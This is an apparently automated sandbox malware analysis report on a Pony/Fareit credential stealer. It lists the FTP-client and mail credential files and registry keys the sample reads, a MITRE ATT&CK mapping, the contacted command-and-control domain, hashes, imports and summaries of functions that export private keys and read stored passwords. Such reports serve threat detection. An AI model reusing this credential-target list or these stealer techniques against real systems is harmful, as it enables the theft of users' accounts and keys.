Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Windows\32BitFtp.ini	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\3D-FTP\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Windows\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\820.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\820.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\820.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword		0_2_0040EB0D
Source: C:\Users\user\Desktop\820.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword		0_2_0040EB0D

Remote Access Functionality

Yara detected Pony

Source: Yara match	File source: 820.exe, type: SAMPLE
Source: Yara match	File source: 0.2.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.820.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 820.exe PID: 7324, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	2 Native API	1 Valid Accounts	1 Valid Accounts	1 Valid Accounts	2 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	11 Access Token Manipulation	11 Access Token Manipulation	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	11 Process Injection	11 Process Injection	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	2 Data from Local System	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
820.exe	100%	ReversingLabs	Win32.Infostealer.Fareit
820.exe	87%	Virustotal		Browse
820.exe	100%	Avira	TR/PSW.Fareit.iloen
820.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
assuredexpresscourierservice.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.ibsensoftware.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
assuredexpresscourierservice.com	unknown	unknown	true	8%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://https://ftp://operawand.dat_Software	820.exe	false		low
https://ac.ecosia.org/autocomplete?q=	820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false		high
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	820.exe	false		low
https://www.ecosia.org/newtab/	820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	820.exe	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	820.exe, 00000000.00000003.1620871035.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428492
Start date and time:	2024-04-19 02:50:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	820.exe (renamed file extension from none to exe)
Original Sample Name:	820
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/1@1/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 83 Number of non-executed functions: 44
Cookbook Comments:	Stop behavior analysis, all processes terminated

Warnings

Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Process:	C:\Users\user\Desktop\820.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	3.233204299824007
Encrypted:	false
SSDEEP:	3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
MD5:	3880EEB1C736D853EB13B44898B718AB
SHA1:	4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
SHA-256:	936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
SHA-512:	3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.22558066200294
TrID:	Win32 Executable (generic) a (10002005/4) 99.56% Win32 EXE Yoda's Crypter (26571/9) 0.26% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	820.exe
File size:	92'160 bytes
MD5:	f318a9ad5a22eb8b1a0849d82b171cc6
SHA1:	4206d66d1279f24097aeec8184dc3dd22cc6513a
SHA256:	820b7ea29750ecab25b85ef56f24d42b51b332b404e594ee55cdff2bc63097df
SHA512:	08aabb6469c060403d38bdc389e94d7997f85ca82f007afde7a0322d46b0fe18cb056050a32078855f81536afc6cd944392adadc3d3528debf5b418f4db761b9
SSDEEP:	1536:127gBvJqTAugrnSIa3HPdcbdReUNPkN1POkXoTvBEAlkzm/:wMdjXAHPqTeUOOLEAp/
TLSH:	56930903F580A0F1C1A26BB137C11771E7F99E797C3A8E4AEF4C49856EF26876B16412
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q%.b...............2.....R......V........0....@........................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x410456
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x62E62571 [Sun Jul 31 06:47:13 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c110bea8b4fbc49066981758795b93e1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
pop ebp
call 00007FE434F5DC5Ah
mov ecx, 0000000Ah
xor edx, edx
div ecx
cmp edx, 05h
jne 00007FE434F5DC04h
jmp 00007FE434F5DC04h
jmp 00007FE434F5DBEBh
call 00007FE434F5DB9Bh
push 00000000h
call 00007FE434F5DD32h
int3
jmp dword ptr [0041817Ch]
jmp dword ptr [00418180h]
jmp dword ptr [00418184h]
jmp dword ptr [00418188h]
jmp dword ptr [0041818Ch]
jmp dword ptr [00418190h]
jmp dword ptr [00418194h]
jmp dword ptr [00418198h]
jmp dword ptr [0041819Ch]
jmp dword ptr [004181A0h]
jmp dword ptr [004181A4h]
jmp dword ptr [004181A8h]
jmp dword ptr [004181ACh]
jmp dword ptr [004181B0h]
jmp dword ptr [004181B4h]
jmp dword ptr [004181B8h]
jmp dword ptr [004181BCh]
jmp dword ptr [004181C0h]
jmp dword ptr [004181C4h]
jmp dword ptr [004181C8h]
jmp dword ptr [004181CCh]
jmp dword ptr [004181D0h]
jmp dword ptr [004181D4h]
jmp dword ptr [004181D8h]
jmp dword ptr [004181DCh]
jmp dword ptr [004181E0h]
jmp dword ptr [000081E4h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17f28	0xc8	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1186b	0x11a00	e2ecf54ac1aeeaa3108e62c399d1b6df	False	0.4605496453900709	data	6.063420518847026	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x100	0x200	62b50172bb46ac5ad3e41d6230f4b01c	False	0.392578125	data	3.0480045566937473	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x14000	0x4eb8	0x4a00	ab53bb856e61986f1207e75a1783b87f	False	0.4161739864864865	data	5.286540277071365	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
KERNEL32.DLL	CreateFileA, ReadFile, CloseHandle, WriteFile, lstrlenA, GlobalLock, GlobalUnlock, LocalFree, LocalAlloc, GetTickCount, lstrcpyA, lstrcatA, GetFileAttributesA, ExpandEnvironmentStringsA, GetFileSize, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, LoadLibraryA, GetProcAddress, GetTempPathA, CreateDirectoryA, DeleteFileA, GetCurrentProcess, WideCharToMultiByte, GetLastError, lstrcmpA, CreateToolhelp32Snapshot, Process32First, OpenProcess, Process32Next, FindFirstFileA, lstrcmpiA, FindNextFileA, FindClose, GetModuleHandleA, GetVersionExA, GetLocaleInfoA, GetSystemInfo, GetWindowsDirectoryA, GetPrivateProfileStringA, SetCurrentDirectoryA, GetPrivateProfileSectionNamesA, GetPrivateProfileIntA, GetCurrentDirectoryA, lstrlenW, MultiByteToWideChar, Sleep, GetModuleFileNameA, LCMapStringA, ExitProcess
advapi32.dll	RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegOpenKeyA, RegEnumKeyExA, RegCreateKeyA, RegSetValueExA, IsTextUnicode, RegOpenCurrentUser, RegEnumValueA, GetUserNameA
ole32.dll	CreateStreamOnHGlobal, GetHGlobalFromStream, CoCreateGuid, CoTaskMemFree, CoCreateInstance, OleInitialize
shell32.dll	ShellExecuteA
shlwapi.dll	StrStrIA, StrRChrIA, StrToIntA, StrStrA, StrCmpNIA, StrStrIW
user32.dll	wsprintfA
userenv.dll	LoadUserProfileA, UnloadUserProfile
wininet.dll	InternetCrackUrlA, InternetCreateUrlA
wsock32.dll	inet_addr, gethostbyname, socket, connect, closesocket, send, select, recv, setsockopt, WSAStartup

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 02:51:06.650149107 CEST	56721	53	192.168.2.4	1.1.1.1
Apr 19, 2024 02:51:06.757905960 CEST	53	56721	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 19, 2024 02:51:06.650149107 CEST	192.168.2.4	1.1.1.1	0x808d	Standard query (0)	assuredexpresscourierservice.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 19, 2024 02:51:06.757905960 CEST	1.1.1.1	192.168.2.4	0x808d	Name error (3)	assuredexpresscourierservice.com	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	02:51:05
Start date:	19/04/2024
Path:	C:\Users\user\Desktop\820.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\820.exe"
Imagebase:	0x400000
File size:	92'160 bytes
MD5 hash:	F318A9AD5A22EB8B1A0849D82B171CC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.1616594000.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000000.1616612816.0000000000414000.00000008.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: unknown Rule: pony, Description: Identify Pony, Source: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:51:07
Start date:	19/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6575781.bat" "C:\Users\user\Desktop\820.exe" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:51:07
Start date:	19/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	28.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	45

Executed Functions

Function 0040EB0D Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EB20
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EB54
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EE0F

Strings

PopAccount, xrefs: 0040EBF7
Technology, xrefs: 0040EBA1
PopPassword, xrefs: 0040EC17
SmtpPassword, xrefs: 0040EC8D
EmailAddress, xrefs: 0040EB86
PopPort, xrefs: 0040EBDC
SmtpServer, xrefs: 0040EC32
SmtpPort, xrefs: 0040EC52
PopServer, xrefs: 0040EBBC
SmtpAccount, xrefs: 0040EC6D

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 1332880857-2111798378
Opcode ID: 5cdfa03e8256becee685f52169c972531b956c65bd473efa2e4e2f5bf7b0f79f
Instruction ID: 5872a348282b04e6e97501da28e04cb8c0a2e1f6fac920b18405b73d1ec69f56
Opcode Fuzzy Hash: 5cdfa03e8256becee685f52169c972531b956c65bd473efa2e4e2f5bf7b0f79f
Instruction Fuzzy Hash: A171973194011CBADF226F52DC02BDD7AB6BF04744F14C4BAB659740B1CE769BA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040D328 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertOpenSystemStoreA.CRYPT32(00000000,004168A4), ref: 0040D3AE
CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D3C7
lstrcmp.KERNEL32(?,2.5.29.37), ref: 0040D3F8

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

lstrcmp.KERNEL32(?,004168B1), ref: 0040D430
CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D44C
CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D464
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D47D
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D4A2
CryptDestroyKey.ADVAPI32(?), ref: 0040D4E0
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D4EB
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D513

Strings

2.5.29.37, xrefs: 0040D3F1

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
String ID: 2.5.29.37
API String ID: 2649496969-3842544949
Opcode ID: 260a90d77c377c55336eea3c72cc038089c46e56b772a7b89d36d4f8143e4344
Instruction ID: 84b30aeb7ad98722db966da1bf5ad5a913a958635eaf3e2438801624c5e0e283
Opcode Fuzzy Hash: 260a90d77c377c55336eea3c72cc038089c46e56b772a7b89d36d4f8143e4344
Instruction Fuzzy Hash: DC512431904209FBDF21AB90DC09BEEBB71AB48309F14853AFA11751F0C779AA94DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404DDD Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00404E4D
lstrcmpiA.KERNEL32(00414FB7,?), ref: 00404E76
lstrcmpiA.KERNEL32(00414FB9,?), ref: 00404E93
FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404F42
FindClose.KERNEL32(?,?,?,?,.ini,00000000,?,?,0000013E,?,*.*,?), ref: 00404F55

Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DA1
Part of subcall function 00401D80: lstrlen.KERNEL32(?,?,?,?,0040210A,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DAB
Part of subcall function 00401D80: lstrcpy.KERNEL32(00000000,?), ref: 00401DBF
Part of subcall function 00401D80: lstrcat.KERNEL32(00000000,?), ref: 00401DC8

Strings

\*.*, xrefs: 00404E0D
.ini, xrefs: 00404EDB
*.*, xrefs: 00404E1C
Sites\, xrefs: 00404F10

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
